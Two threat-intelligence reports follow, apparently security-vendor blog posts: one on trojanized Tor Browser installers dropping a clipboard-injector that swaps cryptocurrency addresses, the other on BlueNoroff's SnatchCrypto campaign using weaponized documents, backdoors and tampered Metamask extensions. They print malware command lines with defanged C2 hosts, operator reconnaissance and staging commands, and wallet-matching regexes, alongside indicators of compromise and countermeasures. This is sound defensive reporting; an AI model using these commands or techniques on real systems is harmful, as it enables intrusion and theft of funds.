It is often the case that something new is just a reincarnation of something old. We have come across a series of clipboard injection attacks on cryptocurrency users, which emerged starting from September 2022. Although we have written about a similar malware attack in 2017 in one of our blogposts, the technique is still very relevant today as it doesn’t have any perfect solution from the perspective of operating system design. The only way to prevent such attacks is to be extremely cautious and attentive, or use a decent anti-malware solution to detect a piece of malicious code. As long as such attacks continue to thrive in the modern ecosystem of the cryptocurrency world, it’s worth explaining how they work and where the danger lies.

In a nutshell, the attack relies on malware replacing part of the clipboard contents once it detects a wallet address in it.

Past attacks

This technique of replacing clipboard contents is more than a decade old. It all started from banking trojans focused on specific banks and replacing bank account numbers in the clipboard. Here is a report from CERT Polska that warned Polish users about such a threat targeting users of local banks in 2013. However, such attacks required detecting a particular internet banking environment, and their success depended also on other fields being filled correctly (i.e. bank SWIFT code, branch name, etc). Focusing on something global and provider-independent, such as a cryptocurrency wallet, made it much more efficient for cryptothieves. Adding increased value of cryptocurrencies made it a very lucrative target. So, this is where we started seeing the first clipboard attacks on cryptocurrency owners. They were replicated and reused in other malware too. We even made a generic detection for some of such families, naming them Generic.ClipBanker.

Why it is dangerous

Despite the attack being fundamentally simple, it harbors more danger than would seem. And not only because it creates irreversible money transfers, but because it is so passive and hard to detect for a normal user. Just think of it, most malware is only efficient when there is a communication channel established between the malware operator and the victim’s system. Backdoors require a control channel, spying trojans require a way to pass stolen data, cryptominers need network communication too, etc. It’s only a small fraction of malware that exist on their own and do not require any communication channel. But this is the most dangerous and harmful kind: self-replicating malware, such as destructive viruses and network worms; ransomware that silently encrypts local files, and so on. While worms and viruses may not connect to the attacker’s control servers, they generate visible network activity, or increase CPU or RAM consumption. So does encrypting ransomware. Clipboard injectors, on the contrary, can be silent for years, show no network activity or any other signs of presence until the disastrous day when they replace a cryptowallet address.

Another factor is detection of the malware payload. While most malware is discovered through an association with known bad infrastructure (IPs, domains, URLs), or when it automatically activates a malicious payload, clipboard injectors do not run their evil payload unless an external condition (the clipboard contains data of certain format) is met. This further lowers the chances of new malware being discovered through automatic sandboxing.

Trojanized Tor Browser installers

Some recent developments in the use of this type of malware seek to abuse Tor Browser, a tool to access the dark web using the Onion protocol, also known as the Tor network. We relate this to the ban of Tor Project’s website in Russia at the end of 2021, which was reported by the Tor Project itself. According to the latter, Russia was the second largest country by number of Tor users in 2021 (with over 300,000 daily users, or 15% of all Tor users). The Tor Project called to help keep Russian users connected to Tor to circumvent censorship. Malware authors heard the call and responded by creating trojanized Tor Browser bundles and distributing them among Russian-speaking users. The first variants appeared in December 2021, but only since August 2022 have we seen a larger wave of torbrowser_ru.exe malicious executables. The trojanized installers offered Tor Browser with a regional language pack, including Russian, as the file name suggests:

Supported languages in the trojanized installer

We have come across hundreds of similar installers that all behaved according to the following scenario:

Trojanized Tor Browser extracting and launching a malware payload

The target user downloads Tor Browser from a third-party resource and starts it as torbrowser.exe. The installer is missing a digital signature and is just a RAR SFX (self-extracting executable) archive. It contains three files:

• The original torbrowser.exe installer with a valid digital signature from the Tor Project.
• A command-line RAR extraction tool with a randomized name.
• A password-protected RAR archive (random password).

The SFX starts the original torbrowser.exe as a disguise, while also running the RAR extraction tool on the embedded password-protected RAR archive. The purpose of protecting it with a password is to evade static-signature detection by antivirus solutions. It doesn’t protect the malware from sandbox-based detection. The password and the destination for the extraction are part of the trojanized torbrowser.exe executable, and may be extracted via manual analysis. Once the file is dropped inside one of the current user AppData subdirectories, the dropped executable is started as a new process and registers itself in the system autostart. Most of the time, the executable is disguised with the icon of a popular application, such as uTorrent.

Clipboard-injector malware

The payload of this installer is passive and communicationless clipboard-injector malware.

The malware is protected with the Enigma packer v4.0, which complicates analysis. Enigma is a commercial software protector. The malware authors likely used a cracked version of the packer lacking any license information. However, if this or another instance from the same malware authors appears in the hands of law enforcement officers, we would like to leave a reference to their system drive serial number, which we extracted from the malware sample: 9061E43A.

The payload of this malware is rather simple: the malware integrates into the chain of Windows clipboard viewers and receives a notification every time the clipboard data is changed. If the clipboard contains text, it scans the contents with a set of embedded regular expressions. Should it find a match, it is replaced with one randomly chosen address from a hardcoded list.

Hexdump of the malware data with regular expressions and replacement wallet IDs

We identified the following regular expressions inside the sample.
bc1[a-zA-HJ-NP-Z0-9]{35,99}($|\s) – Bitcoin
(^|\s)[3]{1}[a-km-zA-HJ-NP-Z1-9]{25,34}($|\s) – Litecoin/Bitcoin Legacy
(^|\s)D[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}($|\s) – Dogecoin
(^|\s)0x[A-Fa-f0-9]{40}($|\s) – ERC-20 (i.e. Ethereum, Tether, Ripple, etc)
(^|\s)[LM]{1}[a-km-zA-HJ-NP-Z1-9]{25,34}($|\s) – Litecoin Legacy
((^|\s)ltc1[a-zA-HJ-NP-Z0-9]{35,99}($|\s) – Litecoin
(^|\s)8[0-9A-B]{1}[1-9A-HJ-NP-Za-km-z]{93,117}($|\s) – Monero
(^|\s)4[0-9A-B]{1}[1-9A-HJ-NP-Za-km-z]{93,117}($|\s) – Monero

Each sample contains thousands of possible replacement addresses for Bitcoin. Including thousands of addresses makes it harder to denylist them or to trace the theft. However, we collected all of them and would like to share them with researchers and investigators in an attachment to this blog.

The malware authors also preserved a feature to disable their creation: a special hotkey combination (Ctrl+Alt+F10). Pressing it causes the malware to unregister all handlers and stop running. The purpose was likely to disable the malware during the testing stage.

Victimology

Among the roughly 16,000 detections, the majority were registered in Russia and Eastern Europe. However, the threat spread to at least 52 countries worldwide. Here are the TOP 10 countries affected, according to our own data:

• Russia
• Ukraine
• United States
• Germany
• Uzbekistan
• Belarus
• China
• Netherlands
• United Kingdom
• France

Detections of the malicious Tor Browser worldwide, January 2022 – February 2023 (download)

Given that we only see a fraction of the real picture, the global number of infections may well be several or even tens of times higher.

Impact

To measure the impact, we collected hundreds of known malware samples, unpacked them from Enigma, and extracted the cryptowallet replacement addresses. Then we walked through the respective blockchains and calculated the total inputs to the wallets, assuming they all came from compromised users. This is how we measured the total loss caused by this single malware developer.

Stolen cryptocurrencies (converted to USD at the exchange rate valid at the time of writing) (download)

Due to its advanced technology that anonymizes transaction data to achieve maximum privacy, the Monero public ledger doesn’t reveal the transferred amount, so we couldn’t really look into it, but it is likely to be very small compared to the Bitcoin theft.

We believe that the actual theft is bigger because this research is focused on Tor Browser abuse. There may be other campaigns, abusing different software and using other means of malware delivery as well as other types of wallets.

Countermeasures

A mistake likely made by all victims of this malware was to download and run Tor Browser from a third-party resource. We haven’t managed to identify a single website that hosts the installer, so it is likely distributed either via torrent downloads or some other software downloader. The installers coming from the official Tor Project were digitally signed and didn’t contain any signs of such malware. So, to stay safe, in the first place, download software only from reliable and trusted sources.

However, even if you do download a rogue file masked as something else, using a decent antivirus solution or uploading the file to VirusTotal could help identify any malicious intent. Despite all attempts to evade detection, the malware will get discovered, it’s only a matter of time.

Lastly, if you would like to check if your system is compromised with malware from the same class, here is a quick Notepad trick. Type or copy the following “Bitcoin address” in Notepad: bc1heymalwarehowaboutyoureplacethisaddress

Now press Ctrl+C and Ctrl+V. If the address changes to something else — the system is likely compromised by a clipboard-injector type of malware, and is dangerous to use. At this stage we recommend scanning your system with security software for any malware presence. But if you want to have full confidence that no hidden backdoors remain, once a system is compromised, it should not be trusted until rebuilt.

Bitcoin address replaced by malware after pasting in an infected system

Stay safe and don’t let your coins fall into the hands of criminals.

Appendix (indicators of compromise)

Examples of clipboard injectors:

0251fd9c0cd98eb9d35768bb82b57590
036b054c9b4f4ab33da63865d69426ff
037c5bacac12ac4fec07652e25cd5f07
0533fc0c282dd534eb8e32c3ef07fba4
05cedc35de2c003f2b76fe38fa62faa5
0a14b25bff0758cdf7472ac3ac7e21a3
0b2ca1c5439fcac80cb7dd70895f41a6
0c4144a9403419f7b04f20be0a53d558
0d09d13cd019cbebf0d8bfff22bf6185
0d571a2c4ae69672a9692275e325b943

Examples of Tor Browser installers:

a7961c947cf360bbca2517ea4c80ee11
0be06631151bbe6528e4e2ad21452a17
a2b8c62fe1b2191485439dd2c2d9a7b5
53d35403fa4aa184d77a4e5d6f1eb060
ad9460e0a58f0c5638a23bb2a78d5ad7
cbb6f4a740078213abc45c27a2ab9d1c
eaf40e175c15c9c9ab3e170859bdef64
89c86c391bf3275790b465232c37ddf5
1ce04300e880fd12260be4d10705c34f
c137495da5456ec0689bbbcca1f9855e

Replacement addresses for Bitcoin wallets:
Download address list (PDF)

BlueNoroff is the name of an APT group coined by Kaspersky researchers while investigating the notorious attack on Bangladesh’s Central Bank back in 2016. A mysterious group with links to Lazarus and an unusual financial motivation for an APT. The group seems to work more like a unit within a larger formation of Lazarus attackers, with the ability to tap into its vast resources: be it malware implants, exploits, or infrastructure. See our earlier publication about BlueNoroff attacks on the banking sector.

Also, we have previously reported on cryptocurrency-focused BlueNoroff attacks. It appears that BlueNoroff shifted focus from hitting banks and SWIFT-connected servers to solely cryptocurrency businesses as the main source of the group’s illegal income. These attackers even took the long route of building fake cryptocurrency software development companies in order to trick their victims into installing legitimate-looking applications that eventually receive backdoored updates. We reported about the first variant of such software back in 2018, but there were many other samples to be found, which was later reported by the US CISA (Cybersecurity and Infrastructure Security Agency) in 2021.

The group is currently active (recent activity was spotted in November 2021).

The latest BlueNoroff’s infection vector

If there’s one thing BlueNoroff has been very good at, it’s the abuse of trust. Be it an internal bank server communicating with SWIFT infrastructure to issue fraudulent transactions, cryptocurrency exchange software installing an update with a backdoor to compromise its own user, or other means. Throughout its SnatchCrypto campaign, BlueNoroff abused trust in business communications: both internal chats between colleagues and interaction with external entities.

According to our research this year, we have seen BlueNoroff operators stalking and studying successful cryptocurrency startups. The goal of the infiltration team is to build a map of interactions between individuals and understand possible topics of interest. This lets them mount high-quality social engineering attacks that look like totally normal interactions. A document sent from one colleague to another on a topic, which is currently being discussed, is unlikely to trigger any suspicion. BlueNoroff compromises companies through precise identification of the necessary people and the topics they are discussing at a given time.

In a simple scenario, it can appear as a notification of a shared document via Google Drive from one colleague/friend to another:

Note the tiny “X” image – it’s an icon for an image that failed to load. We opened the email on an offline system; if the system had been connected to the internet, there would be a real icon for a Google document loaded from a third-party tracking server that immediately notifies the attacker that the target opened the email.

But we also observed a slightly more elaborate approach of an email being forwarded from one colleague to another. This works even better for the attacker, because the original email and the attachment appear to have already been checked by the forwarding party. Ultimately, it elevates the level of trust sufficiently for the document to be opened.

We haven’t shown the forwarder address as it belongs to an attacked user, but note there is a piece of text that reads “via sendgrid.net”. There is no website at sendgrid.net, but it can be a domain owned by a US-based company called Sendgrid, that specializes in email distribution, and email marketing campaigns. According to its website, it offers rich user-tracking capabilities and claims to be sending 90 billion emails every month. It seems to be a legitimate and reputable business, which is probably why Gmail accepts MIME header customization (or sender address forgery in the case of an attack) with nothing more than the short remark “via sendgrid.net”. We informed Sendgrid of this activity. Of course, many users could easily overlook the remark or simply not know what it means. The person, whose name was abused here, seems to be in the top management of the Digital Currency Group (dcg.co), according to public information. To make it clear, we believe that the employee of the company, or the company itself has nothing to do with this attack or the email.

Which other company names have they abused? There are many. We have compiled a list of names and logos so you can watch out for them in your inbox.

The companies, whose logos are displayed here, were chosen by BlueNoroff’s for impersonation in social engineering tricks. Note, this is no proof that the companies listed were compromised.

If you recognize them in incoming communication, there’s no reason to panic, but proceed with caution. For example, you can open the incoming documents in a sandboxed or virtualized offline environment, convert the document to a different format or use a non-standard viewer (i.e., server-side document viewer like GoogleDocs, Collabora Online, ONLYOFFICE, Microsoft Office Online, etc.).

In some cases, we saw what looked like the compromise of an existing registered company and the subsequent use of its resources such as social media accounts, messengers and email to initiate business interaction with the target. If a venture capital company approaches a startup and sends files that look like an investment contract or some other promising documents, the startup won’t hesitate to open them, even if some risk is involved and Microsoft Office adds warning messages.

A compromised LinkedIn account of an actual company representative was used to approach a target and engage with them. The true company’s website is different from the one referenced in the conversation. By manipulating trust in this way, BlueNoroff doesn’t even need to burn valuable 0-days. Instead, they can rely on regular macro-enabled documents or older exploits.

We found they generally stick to CVE-2017-0199, using it again and again before trying something else. The vulnerability initially allowed automatic execution of a remote script linked to a weaponized document. The exploit relies on fetching remote content via an embedded URL inside one of the document meta files. An attentive user may even spot something fishy is happening while MS Word shows a standard loading popup window.

If the document was opened offline or the remote content was blocked, it presents some legitimate content, likely scraped or stolen from another party.

If the document isn’t blocked from connecting to the internet, it fetches a remote template that is another macro-enabled document. The two documents are like two ingredients of an explosive that when mixed together produce a blast. The first one contains two base64-encoded binary objects (one for 32-bit and 64-bit Windows) declared as image data. The second document (the remote template) contains a VBA macro that extracts one of these objects, spawns a new process (notepad.exe) to inject and execute the binary code. Although the binary objects have JPEG headers, they are actually only PE files with modified headers.

Interestingly, BlueNoroff shows improved opsec at this stage. The VBA macro does a cleanup by removing the binary objects and the reference to the remote template from the original document and saving it to the same file. This essentially de-weaponizes the document leaving investigators scratching their head during analysis.

Additionally, we’ve seen that this actor utilized an elevation of privilege (EoP) technique in the initial infection stage. According to our telemetry, the word.exe process, created by opening the malicious document, spawned the legitimate process, dccw.exe. The dccw.exe process is a Windows system file that has auto-elevate permission. Abusing a dccw.exe file is a known technique and we suspect the malware authors used it to run the next stage malware with high privilege. In another case, we have observed word.exe spawning a notepad.exe that received a malware injection and in turn spawning mmc.exe. Unfortunately, the full details of this technique are unavailable due to some missing parts.

Malware infection

We assess that the BlueNoroff group’s interest in cryptocurrency theft started with the SnatchCrypto campaign that has been running since at least 2017. While tracking this campaign, we’ve seen several full-infection chains deliver malware. For the initial infection vector, they usually utilized zipped Windows shortcut files or weaponized Word documents. Note that this group has various methods in their infection arsenal and assembles the infection chain to suit the situation.

Infection chain #1. Windows shortcut

The group has been utilizing this infection vector for a long time. The actor sent an archive-type file containing a shortcut file and document to the victim. All archives used for the initial infection vector had a similar structure. The archive contained a document file such as Word, Excel or PDF file that was password protected alongside another file disguised as a text file containing the document’s password. This file is in fact a Windows shortcut file used to fetch the next stage payload.

Archive file and its contents

Before implanting a Windows executable type backdoor, the malware delivered a Visual Basic Script and Powershell Script through multiple stages.

Infection chain

The fetched VBS file is responsible for fingerprinting the victim by sending basic system information, network adapter information, and a process list. Next, the Powershell agent is delivered in encoded format. It also sends the victim’s general information to the C2 server and next Powershell agent, which is capable of executing commands from the malware operator.

VBS and Powershell delivery chain

Using this Powershell agent a full-featured backdoor is created, executing with the command line parameter:

rundll32.exe %Public%\wmc.dll,#1 4ZK0gYlgqN6ZbKd/NNBWTJOINDc+jJHOFH/9poQ+or9l

The malware checks the command line parameter, decoding it with base64 and decrypting it with an embedded key. The decrypted data contains:

• 63429981 63407466 45.238.25[.]2 443

To verify the parameter’s legitimacy, the malware XORs the second parameter with the 0x5837 hex value, comparing it with the first parameter. If both values match, the malware returns the decrypted C2 address and port. The malware also loads a configuration file (%Public%\Videos\OfficeIntegrator.dat in this case), decrypting it using RC4. This configuration file contains C2 addresses and the next stage payload path will be loaded. The malware has enriched backdoor functionalities that can control infected machines:

• Directory/File manipulation
• Process manipulation
• Registry manipulation
• Executing commands
• Updating configuration
• Stealing stored data from Chrome, Putty, and WinSCP

These are used to deploy other malware tools to monitor the victim: a keylogger and screenshot taker.

Infection chain #2. Weaponized Word document

Another infection chain we’ve seen started from a malicious Word document. This is where the actor utilized remote template injection (CVE-2017-0199) with an embedded malicious Visual Basic Script. In one file (MD5: e26725f34ebcc7fa9976dd07bfbbfba3) the remotely fetched template refers to the first stage document and reads the encoded payload from it, injecting it to the legitimate process.

Remote template infection chain

The other case embedded a malicious Visual Basic Script and extracted a Powershell agent on the victim’s system. Going through this initial infection procedure results in a Windows executable payload being installed.

Infection chain

The persistence backdoor #1 is created in the Start menu path for the persistence mechanism and spawns the first export function with the C2 address.

rundll32.exe "%appdata%\microsoft\windows\start menu\programs\maintenance\default.rdp",#1 https://sharedocs[.]xyz/jyrhl4jowfp/eyi8t5sjli/qzrk8blr_q/rnyyuekwun/yzm1ncj8yb/a3q==

Upon execution, the malware generates a unique installation ID based on the combined hostname, username and current timestamp, which are concatenated and hashed using a simple string hashing algorithm. After sending a beacon to the C2 server, the malware collects general system information, sending it after AES encryption. The data received from the server is expected to have the following structure:

The PROCESS_ID indicates the target process into which the malware will inject a new DLL. DLL_FILE_SIZE is the size of the DLL file to inject. And lastly, DLL_FILE_DATA contains the actual binary executable file to inject.

Based on our telemetry, the actor used another type of backdoor. The persistence backdoor #2 is used to silently run an additional executable payload that is received over an encrypted channel from a remote server. The server address is not hardcoded but rather stored in an encrypted file on the disk (%WINDIR%\AppPatch\PublisherPolicy.tms), whose path is hardcoded in the backdoor. The decrypted configuration file has an identical structure to the configuration file used in Infection chain #1.

As we can see from the above case, the actor behind this campaign delivered the final payload with multi-stage infection and carefully delivered the next payload after checking the fingerprint of the victim. This makes it harder to collect indicators to respond to the attack. With a strict infection chain, a full-featured Windows executable type backdoor is installed. This custom backdoor has long been attributed only to the BlueNoroff group, so we strongly believe that The BlueNoroff group is behind this campaign.

Assets theft

Collecting credentials

One of the strategies this threat actor usually uses after implanting a full-featured backdoor is the common discovery and collection strategy used by APT threat actors. We managed to identify BlueNoroff’s hands-on activities on one victim and observed that the group delivered the final payload very selectively. The malware operator mostly relied on Windows commands when performing initial profiling. They collected user accounts, IP addresses and session information:

• cmd.exe /c “query session >%temp%\TMPBFF2.tmp 2>&1”
• cmd.exe /c “ipconfig /all >%temp%\TMPEEE2.tmp 2>&1”
• cmd.exe /c “whoami >%temp%\TMP218C.tmp 2>&1”
• cmd.exe /c “net user [user account] /domain >%temp%\TMP4B7C.tmp 2>&1”
• cmd.exe /c “net localgroup administrators >%temp%\TMP9518.tmp 2>&1”
• cmd.exe /c “query session >%temp%\TMPBFF2.tmp 2>&1”
• cmd.exe /c “ipconfig /all >%temp%\TMPEEE2.tmp 2>&1”

In the collection phase, the malware operator also relied on Windows commands. After finding folders of interest, they copied a folder named 策略档案 (Chinese for “Policy file“) to the previously created “MM” folder for exfiltration. Also, they collected a configuration file related to cryptocurrency software in order to extract possible credentials or other account details.

• cmd.exe /c “mkdir %public%\MM >%temp%\TMPF522.tmp 2>&1”
• xcopy “%user%\Desktop\[redacted]工作文档\MM策略档案” %public%\MM /S /E /Q /Y
• cmd.exe /c “rd /s /q %public%\MM >%temp%\TMP729D.tmp 2>&1”
• cmd.exe /c “type D:\2\Crypt[redacted]\Crypt[redacted].conf >%temp%\TMP496B.tmp 2>&1″

From one victim, we discovered that the operators manually copied a file that was created by one of the monitoring utilities (such as screenshot or keystroke data) to the %TEMP% folder in order to be sent to an attacker-controlled remote resource.

• cmd.exe /c “copy “%appdata%\Microsoft\Feeds\Creds_5FADD329.dat” %public%\ >%temp%\TMP11C4.tmp 2>&1″

Stealing cryptocurrency

In some cases where the attackers realized they had found a prominent target, they carefully monitored the user for weeks or months. They collected keystrokes and monitored the user’s daily operations, while planning a strategy for financial theft.

If the attackers realize that the target uses a popular browser extension to manage crypto wallets (such as the Metamask extension), they change the extension source from Web Store to local storage and replace the core extension component (backgorund.js) with a tampered version. At first, they are interested in monitoring transactions. The screenshot below shows a comparison of two files: a legitimate Metamask background.js file and its compromised variant with injected lines of code highlighted in yellow. You can see that in this case they set up monitoring of transactions between a particular sender and recipient address. We believe they have a vast monitoring infrastructure that triggers a notification upon discovering large transfers.

The details of the transaction are automatically submitted via HTTP to a C2 server:

In another case, they realized that the user owned a substantial amount of cryptocurrency, but used a hardware wallet. The same method was used to steal funds from that user: they intercepted the transaction process and injected their own logic.

All this sounds easy, but in fact requires a thorough analysis of the Metamask Chrome extension, which is over 6MB of JavaScript code (about 170,000 lines of code) and implementation of a code injection that rewrites transaction details on demand when the extension is used.

This way, when the compromised user transfers funds to another account, the transaction is signed on the hardware wallet. However, given that the action was initiated by the user at the very right moment, the user doesn’t suspect anything fishy is going on and confirms the transaction on the secure device without paying attention to the transaction details. The user doesn’t get too worried when the size of the payment he/she inputs is low and the mistake feels insignificant. However, the attackers modify not only the recipient address, but also push the amount of currency to the limit, essentially draining the account in one move.

The injection is very hard to find manually unless you are very familiar with the Metamask codebase. However, a modification of the Chrome extension leaves a trace. The browser has to be switched to Developer mode and the Metamask extension is installed from a local directory instead of the online store. If the plugin comes from the store, Chrome enforces digital signature validation for the code and guarantees code integrity. So, if you are in doubt, immediately check your Metamask extension and Chrome settings.

Developer mode enabled in Google Chrome

If you use Developer mode, make sure your important extensions come from the Web Store

Unless you are a Metamask developer yourself, this may indicate a Trojanized extension

SnatchCrypto’s victims

The target of the SnatchCrypto campaign is not limited to specific countries and continents. This campaign is aimed at various companies that by the nature of their work deal with cryptocurrencies and smart contracts, DeFi, blockchains, and FinTech industry.

According to our telemetry, we discovered victims from Russia, Poland, Slovenia, Ukraine, the Czech Republic, China, India, the US, Hong Kong, Singapore, the UAE and Vietnam. However, based on the shortened URL click history and decoy documents, we assess there were more victims of this financially motivated attack campaign.

BlueNoroff victims

In addition to the above-mentioned countries, we observed uploads of weaponized documents and compromised Metamask extensions from Indonesia, the UK, Sweden, Germany, Bulgaria, Estonia, Russia, Malta and Portugal.

SnatchCrypto’s attribution

We assess with high confidence that the financially motivated BlueNoroff group is behind this campaign. As a result of understanding the SnatchCrypto campaign’s full chain of infection, we can identify several overlaps with the BlueNoroff group’s previous activities.

VBA macro authorship

Analysis of the VBA macro from the remote template used during the initial infection revealed that the code matched the style and technique previously used by Clément Labro, an offensive security researcher from the company SCRT based out of Morges, Vaud, Switzerland. The original code for process injection from the VBA macro hasn’t been found in the public, so either Clément has privately developed it and later it became available to BlueNoroff, or someone adapted his other VBA code, such as the VBA-RunPE project.

PowerShell scripts overlap

One tool this group relied heavily on is the PowerShell script. Through an initial infection they deployed PowerShell agents on several victims, sending basic system information and executing commands from the control server. They have utilized this PowerShell continuously, while adding small updates.

Backdoor overlap

Through the complicated infection chain, a Windows executable type backdoor is eventually installed on the victim machine. We can only identify this backdoor malware from a few hosts. It has many code similarities with previously known BlueNoroff malware. Using Kaspersky Threat Attribution Engine (KTAE), we see that the malware binaries used in this campaign have considerable code similaritis with known tools of the BlueNoroff group.

Code similarity of backdoor

In addition, we can identify uncommon techniques usually discovered from the BlueNoroff group’s malware. The group’s malware acquires a real C2 address by XORing the resolved IP address with a hardcoded DWORD value. We saw the same technique in our previous BlueNoroff report. The malware used in the SnatchCrypto campaign also used the same technique to acquire real C2 addresses.

Similar C2 address acquiring scheme

In addition, based on the metadata of the Windows shortcut files, we found that the actor behind this campaign is familiar with the Korean operating system environment.

[String Data]
Working Directory (UNICODE):   	 %currentdir%
Arguments (UNICODE):   		 hxxps://bit[.]ly/2Q9tfCz
Icon location (UNICODE):   	 C:\Windows\notepad.exe
[Console Code Page]
Code page: 949 (EUC-KR)

BlueNoroff’s indicators of compromise

Malicious shortcut files
033609f8672303feb70a4c0f80243349
2100e6e585f0a2a43f47093b6fabde74
4a3de148b5df41a56bde78a5dcf41975
5af886030204952ae243eedd25dd43c4    Password.txt.lnk
5f761f9aa3c1a76b17f584b9547a01a7    Password.txt.lnk
7a4a0b0f82e63941713ffd97c127dac8    Password.txt.lnk
813203e18dc1cc8c70d36ed691ca0df3
961e6ec465d7354a8316393b30f9c6e9    Gdpr Password.txt.lnk
9ea244f0a0a955e43293e640bb4ee646
a3c61de3938e7599c0199d2778f7d417    Password.txt.lnk
a5d4bfc3eab1a28ffbcba67625d8292e
a94529063c3acdbfa770657e9126b56d
ab095cb9bc84f37a0a655fbc00e5f50e
b52d30d1db40d5d3c375c4a7c8a115c1
dd2569684ca52ed176f1619ecbfa7aaa
dff21849756eca89ebfaa33ed3185d95
e18dd8e61c736cfc6fff86b07a352c12
e546b851ac4fa5a111d10f40260b1466
e6e64c511f935d31a8859e9f3147fe24    Password.txt.lnk
ea7ed84f7936d4cbafa7cec51fe39cf7
f414f6590636037a6ec92a4d951bdf55
4e207d6e930db4293a6d720cf47858fc
5e44deca6209e64f4093beae92db0c93    Password.txt.lnk
84c427e002fd162d596f3f43ce86fd6a    Password.txt.lnk
c16977fefbdc825a5c6760d2b4ea3914
e5d12ef32f9bd3235d0ac45013040589
09bca3ddbc55f22577d2f3a7fda22d1c    Password.txt.lnk
0eb71e4d2978547bd96221548548e9f0    Password.txt.lnk
da599b0cde613b5512c13f299fec739e    Password.txt.lnk
0c9170a2584ceeddb89e4c0f0a2353ed    Password.txt.lnk
5053103dd5d075c1dc54edf1f8568098    Password.txt.lnk
536bae311c99a4d46f503c68595d4431    Password.txt.lnk
3078265f207fed66470436da07343732    Password.txt.lnk
15f1ae1fed1b2ea71fdb9661823663c6    Password.txt.lnk
56fe283ca3e1c1667191cc7764c260b6    Password.txt.lnk
850751de7b8e158d86469d22ad1c3101    Password.txt.lnk
1a8282f73f393656996107b6ec038dd5    Password.txt.lnk
2ea2ceab1588810961d2fc545e2f957e    Password.txt.lnk
561f70411449b327e3f19d81bb2cea08    Password.txt.lnk
3812cdc4225182326b1425c9f3c2d50b    Password.txt.lnk
4274e6dbc2b7aee4ef080d19fff47ce7    Password.txt.lnk
427bdfe4425e6c8e3ea41d89a2f55870    Password.txt.lnk
7a83be17f4628459e120a64fcab70bac    Password.txt.lnk
5d662269739f1b81072e4c7e48972420    Password.txt.lnk
244a23172af8720882ae0141292f5c47    Password.txt.lnk
a8e2c94abb4c1e77068a5e2d8943296c    Password.txt.lnk
89c26cefa057cf21054e64b5560bf583    Xbox.lnk
805949896d8609412732ee7bfb44900a    Password.txt.lnk
a2be99a5aa26155e6e42a17fbe4fd54d    Security Bugs in rigs.pdf.lnk
28917b4187b3b181e750bf024c6adf70    readme.txt.lnk
9f8e51f4adc007bb0364dfafb19a8c11    UserAssist.lnk
790a21734604b374cf260d20770bfc96    SALT Lending Opportunities.pdf.lnk
db315d7b0d9e8c9ca0aa6892202d498b    Password.txt.lnk
02904e802b5dc2f85eec83e3c1948374    Security Bugs in Operation.pdf.lnk
baebc60beaced775551ec23a691c3da6
302314d503ae88058cb4c33a6ac6b79b    Password.txt.lnk
aeac6f569fb9a7d3f32517aa16e430d6    Password.txt.lnk
926DEEAF253636521C26442938013204
8064e00b931c1cab6ba329d665ea599c    MSEdge.lnk
bcb4a8f190f2124be57496649078e0ae
781a20f27b72c1c901164ce1d025f641    MSAssist.lnk
483e3e0b1dceb4a5a13de65d3556c3fe    MSAssist.lnk

Malicious documents
00a63a302dcaffc9f28826e9dba30e03    Abies VC Presentation.docx
ee9dda6bbbb1138263873dbef36a4d42    Abies VC Presentation.docx
0f1c81c2023eae0fc092ce9f58213bcf    Abies VC Presentation.docx
491e0d776f01f102d36155a46f1a8e3c    Ant Capital Presentation (Azure Protected).docx
c33ce08ebcc6e508bb3a17e0fa7b08f8    Global Brain Pitch Deck.docx
b1911ef720b17aeed69ec41c8e94cc1e
340fb219872ce3c0d3acf924f4f9e598    Venture Labo Investment Pitch Deck.docx
380e9e78dc5bc91fb6cdd8b4a875f20a
eb18ac97dba79ea48c185fb2826467fe
2a9ff6d80cdd4aeed1c48a1ccdc525dd    Abies VC Presentation.docx
ecf75bec770edcd89a3c16d3c4edde1a    Abies VC Presentation (1).docx
6c4943f4c28a07ee8cae41dad16d72b3    Abies VC Presentation.docx
f76e2e6bfbee77ae36049880d7c227f7    Abies VC Presentation.docx
7aec3d1b24ed0946ab740924be5834fa    Abies VC Presentation.docx
47e325e3467bfa80055b7c0eebb11212    Abies VC Presentation.docx
1e0d96c551ca31a4055491edc17ce2dd    Abies VC Presentation.docx
bcf97660ce2b09cbffb454aa5436c9a0    Digital Asset Investment Stategy 2020 (ISO 27001).docx
13ff15ac54a297796e558bb96feaacfd    Abies VC Presentation(ISO 27001).docx
cace67b3ea1ce95298933e38311f6d0b    Adviser-Non-Disclosure-Agreement-NDA(ISO 27001).docx
645adf057b55ef731e624ab435a41757    OKEx and DeepMind Intro Deck(ISO 27001_Protected).docx
bde4747408ce3cfdfe8238a133ebcac9    Circle Business Introduction(ISO 27001).docx
421b1e1ab9951d5b8eeda5b041cb0657    Berkshire Hathaway HomeServices Custody – Mutual NDA.docx
d2f08e227cd528ad8b26e9bbe285ae3c    Union Square Ventures Partnership – Mutual NDA Form.docx
04deb35316ebe1789da042c8876c0622    Chiliz Partnership – Mutual NDA Form.docx
af4eefa8cddc1e412fe91ad33199bd71    FasterCapital Mutual NDA Form.docx
34239a3607d8b5b8ddd6797855f2e827    FasterCapital Introduction 2020 Oct.docx
389172d2794d789727b9f7d01ec27f75    Lundbergs NDA Mutual Form.docx
f40e7998a84495648b0338bc016b9417    Union Square Ventures Partnership – Mutual NDA Form.docx
c8c2a9c50ff848342b0885292d5a8cd4    VIRUS.docx
adf9dc317272dc3724895cb07631c361    Non-Disclosure-Agreement-NDA(ISO 27001).docx
158d84c90a79edb97ec5b840d86217c7    Venture Labo Investment Pitch Deck.docx
e26725f34ebcc7fa9976dd07bfbbfba3    Global Brain Pitch Deck.docx
a435acb5bac92b855d1799a685507522
9969b67ef643bed20a38346dcd69bec4
a6446bfea82b69169b4026222ca253b2
bdf1643c3a10a25d3aba2c4c608ec5d5
b4b695c8e6fea95db5843a43644f88b0
d8561c74ad9624d7c35c0fb15d3ca8fe
f9195b14ed20b30b7c239d50e6418151
3dd638551b03a36d13428696dcada5d8
f26eaa212c503aaba6e5015cb8ef44b5     Venture Labo Investment Pitch Deck.docx
793de76de6d4015ebdd5e552ac5b2f90    Pantera Capital Investment Agreement(Protected).docx
709ec9fbbc3c37ccd39758527c332b84    Pantera Capital Investment Agreement(Protected).docx
89099235aad37a29b7acedc96fda0037    Venture Labo Investment Pitch Deck.docx
358791e1abd64f490c865643a3fbb93d    Z Venture Capital Presentation(Protected).docx
cea54a904434c66f217fbadc571e1507    Z Venture Capital Presentation(Protected).docx
9be0075b9344590b3cabf61c194db180    Rapid Change of Stablecoin (Protected).docx
